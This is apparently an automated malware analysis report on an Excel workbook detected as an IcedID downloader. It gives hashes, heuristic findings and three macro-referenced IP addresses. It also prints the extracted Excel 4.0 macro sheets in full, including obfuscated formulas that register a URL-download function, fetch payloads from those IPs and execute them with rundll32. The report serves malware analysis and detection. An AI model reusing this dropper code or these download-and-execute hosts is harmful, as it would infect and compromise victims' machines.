Office (OOXML) malware analysis — malicious · 6f815d5d8b7ff4bd

MALICIOUS

Office (OOXML)

170.6 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-04-01

MD5: 46b904278c331479397ceeceb7d970d7 SHA-1: 895d44565f3ab09de7014f20495cab14a94c23bf SHA-256: 6f815d5d8b7ff4bd2944e2ff26a6ec9514e3db3bc460d9ace57c98fa2cf38597

242 Risk Score

Heuristics 5

ClamAV: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0
Excel 4.0 macro sheet (2 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: FORMULA.FILL, GOTO, RETURN, EXEC critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://188.127.227.99/ Referenced by macro
- http://45.150.67.29/Referenced by macro
- http://195.123.213.126/Referenced by macro
- http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	5565 bytes
SHA-256: `21b43b24fc2a4b371e0eab7f7cbec4533426891fb10a2e0ff24cac569d7b0f37`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0100-000000000000}"><dimension ref="A1:AU402"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="5.6640625" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><cols><col min="1" max="25" width="5.6640625" style="2"/><col min="26" max="26" width="5.6640625" style="3"/><col min="27" max="16384" width="5.6640625" style="2"/></cols><sheetData><row r="1" spans="1:1" x14ac:dyDescent="0.3"><c r="A1" s="4"/></row><row r="87" spans="34:34" x14ac:dyDescent="0.3"><c r="AH87" s="2" t="s"><v>19</v></c></row><row r="99" spans="37:38" x14ac:dyDescent="0.3"><c r="AL99" s="2" t="s"><v>0</v></c></row><row r="100" spans="37:38" x14ac:dyDescent="0.3"><c r="AL100" s="2" t="s"><v>1</v></c></row><row r="101" spans="37:38" x14ac:dyDescent="0.3"><c r="AL101" s="2" t="s"><v>5</v></c></row><row r="102" spans="37:38" x14ac:dyDescent="0.3"><c r="AL102" s="2" t="s"><v>3</v></c></row><row r="103" spans="37:38" x14ac:dyDescent="0.3"><c r="AL103" s="2" t="s"><v>6</v></c></row><row r="104" spans="37:38" x14ac:dyDescent="0.3"><c r="AL104" s="2" t="s"><v>4</v></c></row><row r="105" spans="37:38" x14ac:dyDescent="0.3"><c r="AK105" s="2" t="s"><v>14</v></c><c r="AL105" s="2" t="s"><v>7</v></c></row><row r="106" spans="37:38" x14ac:dyDescent="0.3"><c r="AK106" s="2" t="s"><v>14</v></c><c r="AL106" s="2" t="s"><v>3</v></c></row><row r="107" spans="37:38" x14ac:dyDescent="0.3"><c r="AK107" s="2" t="s"><v>15</v></c><c r="AL107" s="2" t="s"><v>8</v></c></row><row r="108" spans="37:38" x14ac:dyDescent="0.3"><c r="AK108" s="2" t="s"><v>15</v></c><c r="AL108" s="2" t="s"><v>9</v></c></row><row r="109" spans="37:38" x14ac:dyDescent="0.3"><c r="AK109" s="2" t="s"><v>16</v></c><c r="AL109" s="2" t="s"><v>10</v></c></row><row r="110" spans="37:38" x14ac:dyDescent="0.3"><c r="AK110" s="2" t="s"><v>16</v></c><c r="AL110" s="2" t="s"><v>3</v></c></row><row r="111" spans="37:38" x14ac:dyDescent="0.3"><c r="AL111" s="2" t="s"><v>11</v></c></row><row r="112" spans="37:38" x14ac:dyDescent="0.3"><c r="AK112" s="2" t="s"><v>17</v></c><c r="AL112" s="2" t="s"><v>12</v></c></row><row r="113" spans="37:38" x14ac:dyDescent="0.3"><c r="AL113" s="2" t="s"><v>7</v></c></row><row r="114" spans="37:38" x14ac:dyDescent="0.3"><c r="AL114" s="2" t="s"><v>13</v></c></row><row r="115" spans="37:38" x14ac:dyDescent="0.3"><c r="AL115" s="2" t="s"><v>18</v></c></row><row r="117" spans="37:38" x14ac:dyDescent="0.3"><c r="AK117" s="2" t="s"><v>2</v></c></row><row r="262" spans="41:41" x14ac:dyDescent="0.3"><c r="AO262" s="2" t="str"><f>NOW()&".dat"</f><v>44273,4828008102.dat</v></c></row><row r="265" spans="41:41" x14ac:dyDescent="0.3"><c r="AO265" s="2" t="b"><f>NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=FORMULA.FILL(","&AL101&AL113&AL113&AL99&AL114&"g"&"i"&"s"&"t"&"e"&"r"&"S"&"e"&"r"&"v"&"e"&"r",AP265)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="271" spans="41:41" x14ac:dyDescent="0.3"><c r="AO271" s="2" t="b"><f>NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=""&""&REGISTER("U"&AL99&AL100&AK117&AL110&AL104,"U"&AL99&AL100&AL101&AL102&AL103&AL104&AL105&AL106&AL107&AL108&AL109&AL110&AL111&AL112&AL113&AL114&AL115,AK105&AK106&AK107&AK108&AK109&AK110,AK112,,1,9)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="272" spans="41:41" x14ac:dyDescent="0.3"><c r="AO272" s="2" t="e"><f>NOW()=NOW()=NOW()=HERTY(0,AH87&Z400&AO262,"..\Fol.doka",0,0)</f><v>#NAME?</v></c></row><row r="273" spans="41:47" x14ac:dyDescent="0.3"><c r="AO273" s="2" t="e"><f>NOW()=NOW()=NOW()=HERTY(0,AH87&Z401&AO262,"..\Fol.doka1",0,0)</f><v>#NAME?</v></c></row><row r="274" spans="41:47" x14ac:dyDescent="0.3"><c r="AO274" s="2" t="e"><f>NOW()=NOW()=NOW()=HERTY(0,AH87&Z402&AO262,"..\Fol.doka2",0,0)</f><v>#NAME?</v></c></row><row r="277" spans="41:47" x14ac:dyDescent="0.3"><c r="AO277" s="2" t="e"><f>GOTO(sheet2!X191)</f><v>#N/A</v></c></row><row r="281" spans="41:47" x14ac:dyDescent="0.3"><c r="AU281" s="2" t="b"><f>RETURN()</f><v>0</v></c></row><row r="400" spans="26:26" x14ac:dyDescent="0.3"><c r="Z400" s="2" t="s"><v>20</v></c></row><row r="401" spans="26:26" x14ac:dyDescent="0.3"><c r="Z401" s="2" t="s"><v>21</v></c></row><row r="402" spans="26:26" x14ac:dyDescent="0.3"><c r="Z402" s="2" t="str"><f>"195.123.213.126/"</f><v>195.123.213.126/</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/><drawing r:id="rId2"/></xm:macrosheet>
`xlm_sheet_01.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet2.xml	2434 bytes
SHA-256: `5c4423f87de4646755545b93c22f66e76828f61098e22de81e80e42a48f190a9`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0200-000000000000}"><dimension ref="X211:X220"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="5.88671875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><cols><col min="1" max="16384" width="5.88671875" style="2"/></cols><sheetData><row r="211" spans="24:24" x14ac:dyDescent="0.3"><c r="X211" s="2" t="b"><f>NOW()=NOW()=NOW()=FORMULA.FILL(sheet1!AL99&"u"&"n"&"d"&"l"&"l"&"3"&"2 ",Y211)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="213" spans="24:24" x14ac:dyDescent="0.3"><c r="X213" s="2" t="b"><f>NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(sheet2!Y211&"..\Fol.doka"&sheet1!AP265)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="214" spans="24:24" x14ac:dyDescent="0.3"><c r="X214" s="2" t="b"><f>NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(sheet2!Y211&"..\Fol.doka1"&sheet1!AP265)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="215" spans="24:24" x14ac:dyDescent="0.3"><c r="X215" s="2" t="b"><f>NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(sheet2!Y211&"..\Fol.doka2"&sheet1!AP265)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="220" spans="24:24" x14ac:dyDescent="0.3"><c r="X220" s="2" t="b"><f>GOTO(sheet1!AU279)</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/><drawing r:id="rId2"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.